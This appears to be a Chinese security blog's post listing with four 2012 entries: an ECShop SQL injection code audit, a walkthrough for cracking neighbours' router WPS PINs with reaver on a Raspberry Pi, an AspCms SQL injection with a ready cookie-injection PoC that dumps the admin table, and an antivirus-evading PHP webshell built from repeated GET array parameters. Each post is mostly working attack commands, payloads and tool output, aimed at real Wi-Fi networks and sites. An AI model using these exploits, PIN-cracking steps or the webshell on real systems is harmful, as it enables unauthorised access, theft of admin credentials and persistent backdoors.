代码审计:ECShop V2.7.3 GBK release1106注入0day及修复

作者:Secer 发布时间:December 30, 2012 分类:Web安全

C0deplay Team    j8g

看代码

/* 修改个人资料的处理 */

elseif ($action == ‘act_edit_profile’)

{

    include_once(ROOT_PATH . ‘includes/lib_transaction.php’);

    $birthday = trim($_POST['birthdayYear']) .’-’. trim($_POST['birthdayMonth']) .’-’.

    trim($_POST['birthdayDay']);

    $email = trim($_POST['email']);

    $other['msn'] = $msn = isset($_POST['extend_field1']) ? trim($_POST['extend_field1']) : ”;

    $other['qq'] = $qq = isset($_POST['extend_field2']) ? trim($_POST['extend_field2']) : ”;

    $other['office_phone'] = $office_phone = isset($_POST['extend_field3']) ? trim($_POST['extend_field3']) : ”;

    $other['home_phone'] = $home_phone = isset($_POST['extend_field4']) ? trim($_POST['extend_field4']) : ”;

    $other['mobile_phone'] = $mobile_phone = isset($_POST['extend_field5']) ? trim($_POST['extend_field5']) : ”;

    $sel_question = empty($_POST['sel_question']) ? ” : $_POST['sel_question'];

    $passwd_answer = isset($_POST['passwd_answer']) ? trim($_POST['passwd_answer']) : ”;

    /* 更新用户扩展字段的数据 */

    $sql = ‘SELECT id FROM ‘ . $ecs->table(‘reg_fields’) . ‘ WHERE type = 0 AND display = 1 ORDER BY dis_order, id’;   //读出所有扩展字段的id

    $fields_arr = $db->getAll($sql);

    foreach ($fields_arr AS $val)       //循环更新扩展用户信息

    {

        $extend_field_index = ‘extend_field’ . $val['id'];

        if(isset($_POST[$extend_field_index]))

        {

            $temp_field_content = strlen($_POST[$extend_field_index]) > 100 ? mb_substr(htmlspecialchars($_POST[$extend_field_index]), 0, 99) : htmlspecialchars($_POST[$extend_field_index]);

            $sql = ‘SELECT * FROM ‘ . $ecs->table(‘reg_extend_info’) . ”  WHERE reg_field_id = ‘$val[id]‘ AND user_id = ‘$user_id’”;

            if ($db->getOne($sql))      //如果之前没有记录,则插入

            {

                $sql = ‘UPDATE ‘ . $ecs->table(‘reg_extend_info’) . ” SET content = ‘$temp_field_content’ WHERE reg_field_id = ‘$val[id]‘ AND user_id = ‘$user_id’”;

            }

            else

            {

                $sql = ‘INSERT INTO ‘. $ecs->table(‘reg_extend_info’) . ” (`user_id`, `reg_field_id`, `content`) VALUES (‘$user_id’, ‘$val[id]‘, ‘$temp_field_content’)”;

            }

            $db->query($sql);

        }

    }

    /* 写入密码提示问题和答案 */

    if (!empty($passwd_answer) && !empty($sel_question))

    {

        $sql = ‘UPDATE ‘ . $ecs->table(‘users’) . ” SET `passwd_question`=’$sel_question’, `passwd_answer`=’$passwd_answer’  WHERE `user_id`=’” . $_SESSION['user_id'] . “‘”;

                echo $sql;

        $db->query($sql);

    }

上图

clip_image001

clip_image002

Raspberry Pi下跑aircrack和reaver破解路由器PIN码

作者:Secer 发布时间:December 28, 2012 分类:无线安全

[email protected]
声明:本文仅供安全学习用途 最近心血来潮,想把小区里的无线信号测试个遍。基于目前大多数路由器都支持wps,想必各位基友们都知道aircrack和reaver这两个工具,实属破解pin码,杀人越货,居家旅行之必备良药。像以前跑reaver这样的暴力工具一般都要24小时开着主机,实在浪费功耗,灰常的不绿色!不环保!
话说Raspberry Pi,作为一个攻击环境也是灰常给力的。国外的发烧友们已经针对这个板子,改造了专门用于网络攻击和测试的系统(基于debian) 不过今天这篇文章说的是如何在Raspberry Pi的官方发行版上安装aircrack和reaver ,我用的是苹果充电器+Mini usb 数据线给Raspberry Pi供电,带一个alfa的无线网卡足够了。功耗如此之低,实在是在线跑pin码。长期无线抓包的绝佳方案呢。

PS:懂得可以路过了…… 废话不多说,安装过程如下

1.准备系统环境

apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion

 

2.安装aircrack

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng/
make
make install
cd ../

 

3.安装reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install
cd ../

 

4.使用 aircrack,寻找附近开启wps的路由器,邪恶……嘻嘻

airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    <length:  0>
4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1
B0:48:7A:52:F4:72  -23       42        0    0   1  54e. WPA2 CCMP   PSK  FAST_52F472
8C:21:0A:5F:A2:FA  -35       28        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_5FA2FA
E0:05:C5:D3:3F:00  -42       33        0    0   2  54e. WPA2 CCMP   PSK  TP-LINK_D33F00
EC:17:2F:7D:12:1E  -49       56        1    0   6  54e. WPA2 CCMP   PSK  wg7788
B0:48:7A:5D:22:EA  -51       36        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_1202
C4:CA:D9:6D:6F:B0  -52       30       10    0  11  54e. OPN              ChinaNet
8C:21:0A:8F:2F:1A  -54       18        0    0   1  54e. WPA2 CCMP   PSK  hechengyv
E0:05:C5:C5:70:E8  -55       15        0    0   4  54e. WPA2 CCMP   PSK  wtangqiu
C8:3A:35:55:D1:D8  -55       20        2    0   7  54e. WPA  CCMP   PSK  Tenda_55D1D8
8C:21:0A:84:89:8C  -56       24        0    0   1  54e. WPA2 CCMP   PSK  BATE
C4:CA:D9:6D:5F:60  -55       15        2    0   6  54e. OPN              ChinaNet
EC:17:2F:54:01:2E  -56       13        0    0   1  54e. WPA2 CCMP   PSK  diguadawang
5C:63:BF:74:56:52  -53       18        2    0   1  54e. WPA2 CCMP   PSK  cocohe
08:10:76:40:C2:92  -58       21        0    0   1  54e  WPA2 CCMP   PSK  flytv
E0:05:C5:C0:60:42  -56       21        0    0   9  54e. WPA2 CCMP   PSK  HZLYL
38:83:45:C1:BE:F8  -59       14        1    0   6  54e. WPA2 CCMP   PSK  TICO081122
C4:CA:D9:74:B3:80  -57       13        1    0  11  54e. OPN              ChinaNet
EC:88:8F:AB:F6:5E  -59        5        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_ABF65E
6C:E8:73:B0:67:78  -59        8        0    0   6  54e. WPA2 CCMP   PSK  WJJ~LOVE~WW
C8:3A:35:19:D6:78  -61        9        0    0   1  54e  WPA  CCMP   PSK  Tenda_19D678
E0:05:C5:19:9C:04  -61       18        0    0   7  54 . WPA2 CCMP   PSK  1-14-1-602
C8:64:C7:5A:46:16  -60        3        0    0  11  54e  WPA  CCMP   PSK  STB_CDCF
6C:E8:73:45:A7:E6  -60        6        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_45A7E6
1C:BD:B9:F5:E5:D7  -61       16        0    0   1  54   WPA2 CCMP   PSK  D-Link_DIR-600M
C4:CA:D9:6D:6E:B0  -61       12        0    0   1  54e. OPN              ChinaNet
C8:64:C7:5A:46:15  -61       17        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_CDCF
C8:64:C7:5A:46:17  -61       12        0    0  11  54e  WPA  CCMP   PSK  BACKUP
EC:88:8F:99:75:F2  -61        5        0    0   4  54e. WPA2 CCMP   PSK  6786
8C:21:0A:1E:60:26  -61        3        0    0   1  54e. WPA2 CCMP   PSK  yue
00:23:CD:5B:A7:9E  -61        2        0    0   6  54 . WEP  WEP         1203 wireless
14:E6:E4:44:9B:8E  -62        6        0    0   4  54e. WPA2 CCMP   PSK  bujiankai
00:1D:0F:81:72:06  -62        4        0    0   6  54 . WEP  WEP         Line
FC:C8:97:94:B6:C8  -62        7        0    0  11  54e  WPA  CCMP   PSK  CU_6cmn
B0:48:7A:2A:1B:E6  -62        7        0    0   6  54e. WPA  CCMP   PSK  302
EC:88:8F:8F:CD:BB  -62       11        0    0  11  54e. WPA2 CCMP   PSK  haloso2
EC:17:2F:AC:44:A2  -62        7        0    0   1  54e. WPA2 CCMP   PSK  1-401
C8:64:C7:5A:46:14  -63       24        0    0  11  54e  WPA  CCMP   PSK  CU_CDCF
38:83:45:B5:E3:96  -63        6        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_B5E396
C8:3A:35:2B:35:68  -63       11        0    0  11  54e  WPA2 CCMP   PSK  Tenda_2B3568
00:27:19:6D:4A:5A  -63        1        0    0  11  54e. WPA2 CCMP   PSK  JUJIA-FOGUANG
FC:C8:97:94:B6:CB  -65        9        0    0  11  54e  WPA  CCMP   PSK  BACKUP
FC:C8:97:94:B6:C9  -63       15        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_6cmn
C8:3A:35:06:63:B0  -64        3        0    0   1  54e  WPA2 CCMP   PSK  Tenda_0663B0
8C:21:0A:B0:22:92  -64        3        0    0   1  54e. WPA2 CCMP   PSK  810
14:E6:E4:4F:DE:FE  -64        3        0    0   1  54e. WPA2 CCMP   PSK  YM+ZM
FC:C8:97:94:B6:CA  -65       13        0    0  11  54e  WPA  CCMP   PSK  STB_6cmn
C8:3A:35:52:70:60  -65        2        0    0  11  54e. WPA  CCMP   PSK  Tenda_527060
00:26:5A:B3:08:7E  -65        8        0    0  13  54e  WPA2 CCMP   PSK  503
F4:EC:38:56:6B:DE  -62        2        0    0   9  54e. WPA2 CCMP   PSK  WTO
14:D6:4D:A0:19:60  -62        3        0    0  11  54e  WPA2 TKIP   PSK  wang~XB
C4:CA:D9:6D:6F:40  -62        1        0    0   1  54e. OPN              ChinaNet ctrl+c^ 

结束 话说小区里的无线信号还真是多呢……主要是alfa 的卡给力……呵呵 5.使用reaver 破解开启wps功能的路由器密码 比如这条,信号还不错

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA

[email protected]:~/soft/reaver-1.4#  reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C

 

这样就开始破解了哦,耐心等待结果就好了……不要太邪恶哦。做做测试还是可以的,要做个好童鞋……

########################################################################## 附上reaver调整参数的一些小技巧
reaver:
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

AspCms_v1.5_20110517 SQL注射

作者:Secer 发布时间:December 25, 2012 分类:Web安全

[email protected]

前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注入漏洞。。。。。。。
废话不多说,看代码:

<%
if action = "buy" then
    addOrder()
else
    echoContent()
end if

……略过

Sub echoContent()
    dim id
    id=getForm("id","get")
    
    if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 
    
    dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
    dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
    Dim templatePath,tempStr
    templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"

    set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
    selectproduct=rsObj(0)
    
    Dim linkman,gender,phone,mobile,email,qq,address,postcode
    if isnul(rCookie("loginstatus")) thenwCookie"loginstatus",0
    if rCookie("loginstatus")=1 then
        set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
        linkman=rsObj("truename")
        gender=rsObj("gender")
        phone=rsObj("phone")
        mobile=rsObj("mobile")
        email=rsObj("email")
        qq=rsObj("qq")
        address=rsObj("address")
        postcode=rsObj("postcode")
    else 
        gender=1
    end if
    rsObj.close()
        
    with templateObj 
        .content=loadFile(templatePath)    
        .parseHtml()
        .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
        .content=replaceStr(.content,"[aspcms:linkman]",linkman)        
        .content=replaceStr(.content,"[aspcms:gender]",gender)        
        .content=replaceStr(.content,"[aspcms:phone]",phone)        
        .content=replaceStr(.content,"[aspcms:mobile]",mobile)        
        .content=replaceStr(.content,"[aspcms:email]",email)            
        .content=replaceStr(.content,"[aspcms:qq]",qq)            
        .content=replaceStr(.content,"[aspcms:address]",address)            
        .content=replaceStr(.content,"[aspcms:postcode]",postcode)    
        .parseCommon()         
        echo .content 
    end with
    set templateobj =nothing : terminateAllObjects
End Sub

漏洞很明显,没啥好说的
poc:

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));

利用重复参数数组变量构造php免杀木马

作者:Secer 发布时间:December 25, 2012 分类:Web安全,黑客技巧

最近发现php一个很2b的字符串构造数组的方法:


<?php
$str = "a[]=1&a[]=2&b[]=3";
parse_str($str, $arr);
print_r($arr);
?>

 

以上代码返回结果为:
Array ( [a] => Array ( [0] => 1 [1] => 2 ) [b] => Array ( [0] => 3 ) )

也就是说当字符后面跟随“[]”符号,并且有多个相似结构的时候,返回的数组中会将该字符作为键名,并对应生成一个array键值,内容为该字符在字符串中等于的各个值(太绕了,看代码应该很容易理解)。

那么现在就产生一个问题,假如说一个url是这样的:

http://example.com?p1=v1&p2=v2&p3=v3&p1=v4&p2=v5

我们使用var_dump($_GET['p1'])得到的依据环境不同可能为v1或v4,如果我把p1修改为p1[]呢?
返回的将是Array ( [p1] => Array ( [0] => v1 [1] => v4 ) )

哈哈,你们已经想到了吧,我们把url修改为这样:

http://127.0.0.1/1.php?p1[]=phpinfo&p2[]=ass&p3=v3&p1[]=();&p2[]=ert

假如php代码这样写:
<?php
$a=implode("",$_GET['p1']);
$b=implode("",$_GET['p2']);
var_dump($_GET['p1']);
var_dump($_GET['p2']);
$b($a);
?> 又一种新的php免杀木马产生,见证奇迹的时刻!
by maoniu http://blog.wegeek.org/index.php/archives/28.html